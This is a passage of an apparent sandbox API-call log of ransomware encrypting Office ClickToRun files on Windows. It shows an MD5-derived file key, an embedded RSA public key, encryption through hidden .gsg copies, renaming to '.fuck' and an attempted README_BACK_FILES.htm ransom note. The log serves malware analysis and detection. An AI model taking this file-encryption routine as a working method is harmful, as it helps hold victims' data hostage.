(lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\MasterDescriptor.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0234.679] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x27935c8) returned 1 [0234.689] CryptCreateHash (in: hProv=0x27935c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0234.689] lstrlenA (lpString="kRqkZAFpllEfdydHCwFycviMzMlQm") returned 29 [0234.689] CryptHashData (hHash=0x27176a8, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0234.689] CryptDeriveKey (in: hProv=0x27935c8, Algid=0x6610, hBaseData=0x27176a8, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x27176e8) returned 1 [0234.689] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0234.689] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0234.689] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2791ef0) returned 1 [0234.691] CryptImportPublicKeyInfo (in: hCryptProv=0x2791ef0, dwCertEncodingType=0x1, pInfo=0x27973e8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2797418*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2797420*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2717468) returned 1 [0234.691] CryptEncrypt (in: hKey=0x2717468, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0234.691] CryptEncrypt (in: hKey=0x2717468, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27927f8*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x27927f8*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0234.691] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27927f8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0234.692] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279eba8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x279eba8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0234.692] CryptEncrypt (in: hKey=0x27176e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279eba8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x279eba8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0234.692] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279eba8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0234.692] CloseHandle (hObject=0xffffffff) returned 1 [0234.692] CloseHandle (hObject=0xffffffff) returned 1 [0234.692] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\MasterDescriptor.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\masterdescriptor.en-us.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\masterdescriptor.en-us.xml"), bFailIfExists=0) returned 0 [0234.692] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\MasterDescriptor.en-us.xml", dwFileAttributes=0x0) returned 0 [0234.692] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\MasterDescriptor.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\masterdescriptor.en-us.xml.gsg")) returned 0 [0234.693] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\masterdescriptor.en-us.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\MasterDescriptor.en-us.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\masterdescriptor.en-us.xml.fuck")) returned 0 [0234.693] CryptDestroyHash (hHash=0x27176a8) returned 1 [0234.693] CryptDestroyKey (hKey=0x27176e8) returned 1 [0234.693] CryptReleaseContext (hProv=0x27935c8, dwFlags=0x0) returned 1 [0234.693] FindNextFileA (in: hFindFile=0x27173a8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0234.693] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0234.693] GetLastError () returned 0x5 [0234.693] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\s641033.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\s641033.hash")) returned 0x20 [0234.694] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\s641033.hash", dwFileAttributes=0x80) returned 0 [0234.695] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\s641033.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\s641033.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.695] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\s641033.hash.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\s641033.hash.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.695] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\s641033.hash.gsg", dwFileAttributes=0x2) returned 0 [0234.695] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2793100) returned 1 [0234.705] CryptCreateHash (in: hProv=0x2793100, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0234.705] lstrlenA (lpString="kRqkZAFpllEfdydHCwFycviMzMlQm") returned 29 [0234.705] CryptHashData (hHash=0x2716fe8, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0234.705] CryptDeriveKey (in: hProv=0x2793100, Algid=0x6610, hBaseData=0x2716fe8, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x27174a8) returned 1 [0234.706] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0234.706] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0234.706] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2793188) returned 1 [0234.708] CryptImportPublicKeyInfo (in: hCryptProv=0x2793188, dwCertEncodingType=0x1, pInfo=0x27977f8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2797828*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2797830*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2717528) returned 1 [0234.708] CryptEncrypt (in: hKey=0x2717528, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0234.708] CryptEncrypt (in: hKey=0x2717528, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27935c8*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x27935c8*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0234.709] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27935c8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0234.709] ReadFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x277e300, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0234.709] CryptEncrypt (in: hKey=0x27174a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0234.709] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0234.709] CloseHandle (hObject=0xffffffff) returned 1 [0234.709] CloseHandle (hObject=0xffffffff) returned 1 [0234.709] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\s641033.hash.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\s641033.hash.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\s641033.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\s641033.hash"), bFailIfExists=0) returned 0 [0234.709] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\s641033.hash", dwFileAttributes=0x0) returned 0 [0234.710] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\s641033.hash.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\s641033.hash.gsg")) returned 0 [0234.710] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\s641033.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\s641033.hash"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\s641033.hash.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\s641033.hash.fuck")) returned 0 [0234.710] CryptDestroyHash (hHash=0x2716fe8) returned 1 [0234.710] CryptDestroyKey (hKey=0x27174a8) returned 1 [0234.710] CryptReleaseContext (hProv=0x2793100, dwFlags=0x0) returned 1 [0234.710] FindNextFileA (in: hFindFile=0x27173a8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0234.710] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0234.710] GetLastError () returned 0x5 [0234.710] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\stream.x64.en-us.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\stream.x64.en-us.man.dat")) returned 0x20 [0234.711] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\stream.x64.en-us.man.dat", dwFileAttributes=0x80) returned 0 [0234.711] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\stream.x64.en-us.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\stream.x64.en-us.man.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.711] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\stream.x64.en-us.man.dat.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\stream.x64.en-us.man.dat.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.711] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\stream.x64.en-us.man.dat.gsg", dwFileAttributes=0x2) returned 0 [0234.712] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x27925d8) returned 1 [0234.724] CryptCreateHash (in: hProv=0x27925d8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0234.724] lstrlenA (lpString="eDbLtLOTzZPKVGRanogJIQSQzMlQm") returned 29 [0234.724] CryptHashData (hHash=0x2716fe8, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0234.724] CryptDeriveKey (in: hProv=0x27925d8, Algid=0x6610, hBaseData=0x2716fe8, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x27176a8) returned 1 [0234.724] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0234.724] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0234.724] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2791780) returned 1 [0234.727] CryptImportPublicKeyInfo (in: hCryptProv=0x2791780, dwCertEncodingType=0x1, pInfo=0x27978c8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27978f8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2797900*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x27176e8) returned 1 [0234.727] CryptEncrypt (in: hKey=0x27176e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0234.727] CryptEncrypt (in: hKey=0x27176e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2792770*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2792770*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0234.727] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2792770, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0234.727] ReadFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x277e300, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0234.727] CryptEncrypt (in: hKey=0x27176a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0234.728] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0234.728] CloseHandle (hObject=0xffffffff) returned 1 [0234.728] CloseHandle (hObject=0xffffffff) returned 1 [0234.728] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\stream.x64.en-us.man.dat.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\stream.x64.en-us.man.dat.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\stream.x64.en-us.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\stream.x64.en-us.man.dat"), bFailIfExists=0) returned 0 [0234.728] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\stream.x64.en-us.man.dat", dwFileAttributes=0x0) returned 0 [0234.729] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\stream.x64.en-us.man.dat.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\stream.x64.en-us.man.dat.gsg")) returned 0 [0234.729] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\stream.x64.en-us.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\stream.x64.en-us.man.dat"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\stream.x64.en-us.man.dat.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\stream.x64.en-us.man.dat.fuck")) returned 0 [0234.729] CryptDestroyHash (hHash=0x2716fe8) returned 1 [0234.729] CryptDestroyKey (hKey=0x27176a8) returned 1 [0234.729] CryptReleaseContext (hProv=0x27925d8, dwFlags=0x0) returned 1 [0234.729] FindNextFileA (in: hFindFile=0x27173a8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0234.730] FindClose (in: hFindFile=0x27173a8 | out: hFindFile=0x27173a8) returned 1 [0234.730] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\readme_back_files.htm")) returned 0xffffffff [0234.730] AreFileApisANSI () returned 1 [0234.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2aa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0234.730] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.730] GetLastError () returned 0x5 [0234.730] GetLastError () returned 0x5 [0234.730] FindNextFileA (in: hFindFile=0x27175e8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0234.730] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x27176a8 [0234.799] FindNextFileA (in: hFindFile=0x27176a8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0234.799] FindNextFileA (in: hFindFile=0x27176a8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0234.799] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0234.799] GetLastError () returned 0x5 [0234.799] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\masterdescriptor.x-none.xml")) returned 0x20 [0234.802] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\MasterDescriptor.x-none.xml", dwFileAttributes=0x80) returned 0 [0234.803] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\masterdescriptor.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.803] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\MasterDescriptor.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\masterdescriptor.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.803] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\MasterDescriptor.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0234.803] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2791cd0) returned 1 [0234.813] CryptCreateHash (in: hProv=0x2791cd0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0234.813] lstrlenA (lpString="eDbLtLOTzZPKVGRanogJIQSQzMlQm") returned 29 [0234.813] CryptHashData (hHash=0x27170a8, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0234.813] CryptDeriveKey (in: hProv=0x2791cd0, Algid=0x6610, hBaseData=0x27170a8, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2716fe8) returned 1 [0234.813] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0234.813] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, 